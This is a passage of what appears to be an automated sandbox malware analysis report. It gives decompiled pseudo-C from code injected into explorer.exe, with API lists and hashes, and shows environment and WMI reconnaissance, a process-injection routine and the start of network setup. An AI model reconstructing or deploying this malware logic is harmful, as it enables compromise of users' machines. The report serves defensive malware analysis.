                  				 *_t224 = 0x209;
                  				_push(_t219);
                  				_push(L"USERPROFILE");
                  				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                  					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                  					_t152 =  *0x9e684; // 0x293f8f0
                  					_t224 =  &(_t224[5]);
                  					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                  				}
                  				_push(0x20a);
                  				_t64 = _t222 + 0x122a; // 0x122a
                  				_t169 = L"TEMP";
                  				_t127 =  *0x9e684; // 0x293f8f0
                  				_push(_t169);
                  				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                  					_t149 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                  				}
                  				_push(0x40);
                  				_t220 = L"SystemDrive";
                  				_push( &_v180);
                  				_t130 =  *0x9e684; // 0x293f8f0
                  				_push(_t220);
                  				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                  					_t147 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                  				}
                  				_v8 = 0x7f;
                  				_t72 = _t222 + 0x199c; // 0x199c
                  				_t134 =  *0x9e684; // 0x293f8f0
                  				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                  				_t75 = _t222 + 0x100c; // 0x100c
                  				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                  				_t76 = _t222 + 0x1858; // 0x1858
                  				E000922D3( &_v2680, _t76, 0x20);
                  				_t79 = _t222 + 0x1878; // 0x1878
                  				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                  				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                  				return _t222;
                  			}

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 0da35a10afc6bcadec3f4ad10f45e6bf3f3245d2d58503743572c6aa095a296a
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				void* _v28;
                  				signed int _v32;
                  				char _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				intOrPtr _v56;
                  				signed int _v60;
                  				char* _v72;
                  				signed short _v80;
                  				signed int _v84;
                  				char _v88;
                  				char _v92;
                  				char _v96;
                  				intOrPtr _v100;
                  				char _v104;
                  				char _v616;
                  				intOrPtr* _t159;
                  				char _t165;
                  				signed int _t166;
                  				signed int _t173;
                  				signed int _t178;
                  				signed int _t186;
                  				intOrPtr* _t187;
                  				signed int _t188;
                  				signed int _t192;
                  				intOrPtr* _t193;
                  				intOrPtr _t200;
                  				intOrPtr* _t205;
                  				signed int _t207;
                  				signed int _t209;
                  				intOrPtr* _t210;
                  				intOrPtr _t212;
                  				intOrPtr* _t213;
                  				signed int _t214;
                  				char _t217;
                  				signed int _t218;
                  				signed int _t219;
                  				signed int _t230;
                  				signed int _t235;
                  				signed int _t242;
                  				signed int _t243;
                  				signed int _t244;
                  				signed int _t245;
                  				intOrPtr* _t247;
                  				intOrPtr* _t251;
                  				signed int _t252;
                  				intOrPtr* _t253;
                  				void* _t255;
                  				intOrPtr* _t261;
                  				signed int _t262;
                  				signed int _t283;
                  				signed int _t289;
                  				char* _t298;
                  				void* _t320;
                  				signed int _t322;
                  				intOrPtr* _t323;
                  				intOrPtr _t324;
                  				signed int _t327;
                  				intOrPtr* _t328;
                  				intOrPtr* _t329;
                  
                  				_v32 = _v32 & 0x00000000;
                  				_v60 = _v60 & 0x00000000;
                  				_v56 = __edx;
                  				_v100 = __ecx;
                  				_t159 = E0008D523(__ecx);
                  				_t251 = _t159;
                  				_v104 = _t251;
                  				if(_t251 == 0) {
                  					return _t159;
                  				}
                  				_t320 = E00088604(0x10);
                  				_v36 = _t320;
                  				_pop(_t255);
                  				if(_t320 == 0) {
                  					L53:
                  					E0008861A( &_v60, 0xfffffffe);
                  					E0008D5D7( &_v104);
                  					return _t320;
                  				}
                  				_t165 = E000895E1(_t255, 0x536);
                  				 *_t328 = 0x609;
                  				_v52 = _t165;
                  				_t166 = E000895E1(_t255);
                  				_push(0);
                  				_push(_v56);
                  				_v20 = _t166;
                  				_push(_t166);
                  				_push(_a4);
                  				_t322 = E000892E5(_t165);
                  				_v60 = _t322;
                  				E000885D5( &_v52);
                  				E000885D5( &_v20);
                  				_t329 = _t328 + 0x20;
                  				if(_t322 != 0) {
                  					_t323 = __imp__#2;
                  					_v40 =  *_t323(_t322);
                  					_t173 = E000895E1(_t255, 0x9e4);
                  					_v20 = _t173;
                  					_v52 =  *_t323(_t173);
                  					E000885D5( &_v20);
                  					_t324 = _v40;
                  					_t261 =  *_t251;
                  					_t252 = 0;
                  					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                  					__eflags = _t178;
                  					if(_t178 != 0) {
                  						L52:
                  						__imp__#6(_t324);
                  						__imp__#6(_v52);
                  						goto L53;
                  					}
                  					_t262 = _v32;
                  					_v28 = 0;
                  					_v20 = 0;
                  					__eflags = _t262;
                  					if(_t262 == 0) {
                  						L49:
                  						 *((intOrPtr*)( *_t262 + 8))(_t262);
                  						__eflags = _t252;
                  						if(_t252 == 0) {
                  							E0008861A( &_v36, 0);
                  							_t320 = _v36;
                  						} else {
                  							 *(_t320 + 8) = _t252;
                  							 *_t320 = E000891E3(_v100);
                  							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                  						}
                  						goto L52;
                  					} else {
                  						goto L6;
                  					}
                  					while(1) {
                  						L6:
                  						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                  						__eflags = _t186;
                  						if(_t186 != 0) {
                  							break;
                  						}
                  						_v16 = 0;
                  						_v48 = 0;
                  						_v12 = 0;
                  						_v24 = 0;
                  						__eflags = _v84;
                  						if(_v84 == 0) {
                  							break;
                  						}
                  						_t187 = _v28;
                  						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                  						__eflags = _t188;
                  						if(_t188 >= 0) {
                  							__imp__#20(_v24, 1,  &_v16);
                  							__imp__#19(_v24, 1,  &_v48);
                  							_t46 = _t320 + 0xc; // 0xc
                  							_t253 = _t46;
                  							_t327 = _t252 << 3;
                  							_t47 = _t327 + 8; // 0x8
                  							_t192 = E00088698(_t327, _t47);
                  							__eflags = _t192;
                  							if(_t192 == 0) {
                  								__imp__#16(_v24);
                  								_t193 = _v28;
                  								 *((intOrPtr*)( *_t193 + 8))(_t193);
                  								L46:
                  								_t252 = _v20;
                  								break;
                  							}
                  							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                  							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                  							_t200 =  *_t253;
                  							__eflags =  *(_t327 + _t200 + 4);
                  							if( *(_t327 + _t200 + 4) == 0) {
                  								_t136 = _t320 + 0xc; // 0xc
                  								E0008861A(_t136, 0);
                  								E0008861A( &_v36, 0);
                  								__imp__#16(_v24);
                  								_t205 = _v28;
                  								 *((intOrPtr*)( *_t205 + 8))(_t205);
                  								_t320 = _v36;
                  								goto L46;
                  							}
                  							_t207 = _v16;
                  							while(1) {
                  								_v12 = _t207;
                  								__eflags = _t207 - _v48;
                  								if(_t207 > _v48) {
                  									break;
                  								}
                  								_v44 = _v44 & 0x00000000;
                  								_t209 =  &_v12;
                  								__imp__#25(_v24, _t209,  &_v44);
                  								__eflags = _t209;
                  								if(_t209 < 0) {
                  									break;
                  								}
                  								_t212 = E000891E3(_v44);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                  								_t213 = _v28;
                  								_t281 =  *_t213;
                  								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                  								__eflags = _t214;
                  								if(_t214 < 0) {
                  									L39:
                  									__imp__#6(_v44);
                  									_t207 = _v12 + 1;
                  									__eflags = _t207;
                  									continue;
                  								}
                  								_v92 = E000895E1(_t281, 0x250);
                  								 *_t329 = 0x4cc;
                  								_t217 = E000895E1(_t281);
                  								_t283 = _v80;
                  								_v96 = _t217;
                  								_t218 = _t283 & 0x0000ffff;
                  								__eflags = _t218 - 0xb;
                  								if(__eflags > 0) {
                  									_t219 = _t218 - 0x10;
                  									__eflags = _t219;
                  									if(_t219 == 0) {
                  										L35:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											L38:
                  											E000885D5( &_v92);
                  											E000885D5( &_v96);
                  											__imp__#9( &_v80);
                  											goto L39;
                  										}
                  										_push(_v72);
                  										_push(L"%d");
                  										L37:
                  										_push(0xc);
                  										_push(_t289);
                  										E00089640();
                  										_t329 = _t329 + 0x10;
                  										goto L38;
                  									}
                  									_t230 = _t219 - 1;
                  									__eflags = _t230;
                  									if(_t230 == 0) {
                  										L33:
                  										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                  										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                  										__eflags = _t289;
                  										if(_t289 == 0) {
                  											goto L38;
                  										}
                  										_push(_v72);
                  										_push(L"%u");
                  										goto L37;
                  									}
                  									_t235 = _t230 - 1;
                  									__eflags = _t235;
                  									if(_t235 == 0) {
                  										goto L33;
                  									}
                  									__eflags = _t235 == 1;
                  									if(_t235 == 1) {
                  										goto L33;
                  									}
                  									L28:
                  									__eflags = _t283 & 0x00002000;
                  									if((_t283 & 0x00002000) == 0) {
                  										_v88 = E000895E1(_t283, 0x219);
                  										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                  										E000885D5( &_v88);
                  										_t329 = _t329 + 0x18;
                  										_t298 =  &_v616;
                  										L31:
                  										_t242 = E000891E3(_t298);
                  										L32:
                  										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                  										goto L38;
                  									}
                  									_t242 = E0008DA20( &_v80);
                  									goto L32;
                  								}
                  								if(__eflags == 0) {
                  									__eflags = _v72 - 0xffff;
                  									_t298 = L"TRUE";
                  									if(_v72 != 0xffff) {
                  										_t298 = L"FALSE";
                  									}
                  									goto L31;
                  								}
                  								_t243 = _t218 - 1;
                  								__eflags = _t243;
                  								if(_t243 == 0) {
                  									goto L38;
                  								}
                  								_t244 = _t243 - 1;
                  								__eflags = _t244;
                  								if(_t244 == 0) {
                  									goto L35;
                  								}
                  								_t245 = _t244 - 1;
                  								__eflags = _t245;
                  								if(_t245 == 0) {
                  									goto L35;
                  								}
                  								__eflags = _t245 != 5;
                  								if(_t245 != 5) {
                  									goto L28;
                  								}
                  								_t298 = _v72;
                  								goto L31;
                  							}
                  							__imp__#16(_v24);
                  							_t210 = _v28;
                  							 *((intOrPtr*)( *_t210 + 8))(_t210);
                  							_t252 = _v20;
                  							L42:
                  							_t262 = _v32;
                  							_t252 = _t252 + 1;
                  							_v20 = _t252;
                  							__eflags = _t262;
                  							if(_t262 != 0) {
                  								continue;
                  							}
                  							L48:
                  							_t324 = _v40;
                  							goto L49;
                  						}
                  						_t247 = _v28;
                  						 *((intOrPtr*)( *_t247 + 8))(_t247);
                  						goto L42;
                  					}
                  					_t262 = _v32;
                  					goto L48;
                  				} else {
                  					E0008861A( &_v36, _t322);
                  					_t320 = _v36;
                  					goto L53;
                  				}
                  			}

                  APIs
                    • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                    • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                    • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                    • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                    • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                  • SysFreeString.OLEAUT32(?), ref: 0008DF82
                  • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 1290676130-1412513891
                  • Opcode ID: fd0da92d71a609a41cde1273ae150ca2c70824a64de54787017548948694e438
                  • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                  • Opcode Fuzzy Hash: fd0da92d71a609a41cde1273ae150ca2c70824a64de54787017548948694e438
                  • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				struct HINSTANCE__* _v40;
                  				char _v44;
                  				char _v56;
                  				char _v72;
                  				struct _WNDCLASSEXA _v120;
                  				intOrPtr _t69;
                  				intOrPtr _t71;
                  				intOrPtr _t75;
                  				intOrPtr _t80;
                  				intOrPtr _t92;
                  				intOrPtr _t95;
                  				intOrPtr _t96;
                  				struct HWND__* _t106;
                  				intOrPtr* _t113;
                  				struct HINSTANCE__* _t116;
                  				intOrPtr _t120;
                  				intOrPtr _t126;
                  				intOrPtr _t131;
                  				intOrPtr _t134;
                  				intOrPtr _t136;
                  				intOrPtr _t139;
                  				char _t140;
                  				intOrPtr _t141;
                  
                  				_t69 =  *0x9e688; // 0xb0000
                  				_t126 = __ecx;
                  				_t134 = __edx;
                  				_t116 = 0;
                  				_v36 = __edx;
                  				_v16 = 0;
                  				_v44 = 0;
                  				_v40 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				_v24 = 0;
                  				_v20 = __ecx;
                  				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                  					E0008E23E(0x1f4);
                  					_t116 = 0;
                  				}
                  				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                  				_v28 = _t116;
                  				if( *_t113 != 0x4550) {
                  					L12:
                  					if(_v8 != 0) {
                  						_t75 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L14:
                  					if(_v12 != 0) {
                  						_t136 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                  					}
                  					if(_v16 != 0) {
                  						_t71 =  *0x9e780; // 0x0
                  						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                  					}
                  					return _v8;
                  				}
                  				_push(_t116);
                  				_push(0x8000000);
                  				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                  				_push(0x40);
                  				_push( &_v44);
                  				_push(_t116);
                  				_push(0xe);
                  				_push( &_v16);
                  				_t80 =  *0x9e780; // 0x0
                  				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                  					goto L12;
                  				}
                  				_v120.style = 0xb;
                  				_v120.cbSize = 0x30;
                  				_v120.lpszClassName =  &_v56;
                  				asm("movsd");
                  				_v120.lpfnWndProc = DefWindowProcA;
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsb");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsw");
                  				asm("movsb");
                  				_v120.cbWndExtra = 0;
                  				_v120.lpszMenuName = 0;
                  				_v120.cbClsExtra = 0;
                  				_v120.hInstance = 0;
                  				if(RegisterClassExA( &_v120) != 0) {
                  					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                  					if(_t106 != 0) {
                  						DestroyWindow(_t106);
                  						UnregisterClassA( &_v56, 0);
                  					}
                  				}
                  				_t139 =  *0x9e780; // 0x0
                  				_push(0x40);
                  				_push(0);
                  				_push(2);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v12);
                  				_push(GetCurrentProcess());
                  				_push(_v16);
                  				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                  					_t126 = _v20;
                  					goto L12;
                  				} else {
                  					_push(0x40);
                  					_push(0);
                  					_push(2);
                  					_push( &_v24);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_t126 = _v20;
                  					_push( &_v8);
                  					_t92 =  *0x9e780; // 0x0
                  					_push(_t126);
                  					_push(_v16);
                  					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                  						goto L12;
                  					}
                  					_t140 = E00088669( *0x9e688, 0x1ac4);
                  					_v32 = _t140;
                  					if(_t140 == 0) {
                  						goto L12;
                  					}
                  					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                  					_t95 =  *0x9e684; // 0x293f8f0
                  					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                  					_t120 =  *0x9e684; // 0x293f8f0
                  					_t131 = _t96;
                  					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                  					E0008861A( &_v32, 0x1ac4);
                  					_t141 =  *0x9e688; // 0xb0000
                  					 *0x9e688 = _t131;
                  					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                  					E0008C63F(_v12, _v8, _v36);
                  					 *0x9e688 = _t141;
                  					goto L14;
                  				}
                  			}

                  APIs
                  • RegisterClassExA.USER32 ref: 0008C785
                  • CreateWindowExA.USER32 ref: 0008C7B0
                  • DestroyWindow.USER32 ref: 0008C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                  • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                  • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                  • API String ID: 3082384575-2319545179
                  • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                  • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
                  • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                  				char _v8;
                  				char _v16;
                  				short _v144;
                  				short _v664;
                  				void* _t19;
                  				struct HINSTANCE__* _t22;
                  				long _t23;
                  				long _t24;
                  				char* _t27;
                  				WCHAR* _t32;
                  				long _t33;
                  				intOrPtr _t37;
                  				intOrPtr _t38;
                  				void* _t49;
                  				int _t53;
                  				void* _t54;
                  				intOrPtr* _t55;
                  				void* _t57;
                  
                  				_t49 = __edx;
                  				OutputDebugStringA("Hello qqq");
                  				if(_a8 != 1) {
                  					if(_a8 != 0) {
                  						L12:
                  						return 1;
                  					}
                  					SetLastError(0xaa);
                  					L10:
                  					return 0;
                  				}
                  				E000885EF();
                  				_t19 = E0008980C( &_v16);
                  				_t57 = _t49;
                  				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                  					goto L12;
                  				} else {
                  					E00088F78();
                  					GetModuleHandleA(0);
                  					_t22 = _a4;
                  					 *0x9e69c = _t22;
                  					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                  					_t24 = GetLastError();
                  					if(_t23 != 0 && _t24 != 0x7a) {
                  						memset( &_v144, 0, 0x80);
                  						_t55 = _t54 + 0xc;
                  						_t53 = 0;
                  						do {
                  							_t27 = E000895C7(_t53);
                  							_a8 = _t27;
                  							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                  							E000885C2( &_a8);
                  							_t53 = _t53 + 1;
                  						} while (_t53 < 0x2710);
                  						E00092A5B( *0x9e69c);
                  						 *_t55 = 0x7c3;
                  						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                  						 *_t55 = 0xb4e;
                  						_t32 = E000895E1(0x9ba28);
                  						_a8 = _t32;
                  						_t33 = GetFileAttributesW(_t32);
                  						_push( &_a8);
                  						if(_t33 == 0xffffffff) {
                  							E000885D5();
                  							_v8 = 0;
                  							_t37 =  *0x9e684; // 0x293f8f0
                  							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                  							 *0x9e6a8 = _t38;
                  							if(_t38 == 0) {
                  								goto L10;
                  							}
                  							goto L12;
                  						}
                  						E000885D5();
                  					}
                  					goto L10;
                  				}
                  			}

                  APIs
                  • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                  • SetLastError.KERNEL32(000000AA), ref: 000860D7
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                  • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                  • GetLastError.KERNEL32 ref: 00085FEF
                  • memset.MSVCRT ref: 00086013
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                  • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                  • String ID: Hello qqq
                  • API String ID: 1203100507-3610097158
                  • Opcode ID: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
                  • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                  • Opcode Fuzzy Hash: 6c4e10b46dcdce25dcf17f39e375e9fff7939ad34e1c600105cf40c827e96d10
                  • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				char _v64;
                  				int _v76;
                  				void* _v80;
                  				intOrPtr _v100;
                  				int _v104;
                  				void* _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				char* _v120;
                  				void _v124;
                  				char _v140;
                  				void _v396;
                  				void _v652;
                  				intOrPtr _t105;
                  				intOrPtr _t113;
                  				intOrPtr* _t115;
                  				intOrPtr _t118;
                  				intOrPtr _t121;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t131;
                  				char _t133;
                  				intOrPtr _t136;
                  				char _t138;
                  				char _t139;
                  				intOrPtr _t141;
                  				intOrPtr _t147;
                  				intOrPtr _t154;
                  				intOrPtr _t158;
                  				intOrPtr _t162;
                  				intOrPtr _t164;
                  				intOrPtr _t166;
                  				intOrPtr _t172;
                  				intOrPtr _t176;
                  				void* _t183;
                  				void* _t185;
                  				intOrPtr _t186;
                  				char _t195;
                  				intOrPtr _t203;
                  				intOrPtr _t204;
                  				signed int _t209;
                  				void _t212;
                  				intOrPtr _t213;
                  				void* _t214;
                  				intOrPtr _t216;
                  				char _t217;
                  				intOrPtr _t218;
                  				signed int _t219;
                  				signed int _t220;
                  				void* _t221;
                  
                  				_v40 = _v40 & 0x00000000;
                  				_v24 = 4;
                  				_v36 = 1;
                  				_t214 = __edx;
                  				memset( &_v396, 0, 0x100);
                  				memset( &_v652, 0, 0x100);
                  				_v64 = E000895C7(0x85b);
                  				_v60 = E000895C7(0xdc9);
                  				_v56 = E000895C7(0x65d);
                  				_v52 = E000895C7(0xdd3);
                  				_t105 = E000895C7(0xb74);
                  				_v44 = _v44 & 0;
                  				_t212 = 0x3c;
                  				_v48 = _t105;
                  				memset( &_v124, 0, 0x100);
                  				_v116 = 0x10;
                  				_v120 =  &_v140;
                  				_v124 = _t212;
                  				_v108 =  &_v396;
                  				_v104 = 0x100;
                  				_v80 =  &_v652;
                  				_push( &_v124);
                  				_push(0);
                  				_v76 = 0x100;
                  				_push(E0008C379(_t214));
                  				_t113 =  *0x9e6a4; // 0x0
                  				_push(_t214);
                  				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                  					_t209 = 0;
                  					_v20 = 0;
                  					do {
                  						_t115 =  *0x9e6a4; // 0x0
                  						_v12 = 0x8404f700;
                  						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                  						if(_t213 != 0) {
                  							_t195 = 3;
                  							_t185 = 4;
                  							_v8 = _t195;
                  							_t118 =  *0x9e6a4; // 0x0
                  							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                  							_v8 = 0x3a98;
                  							_t121 =  *0x9e6a4; // 0x0
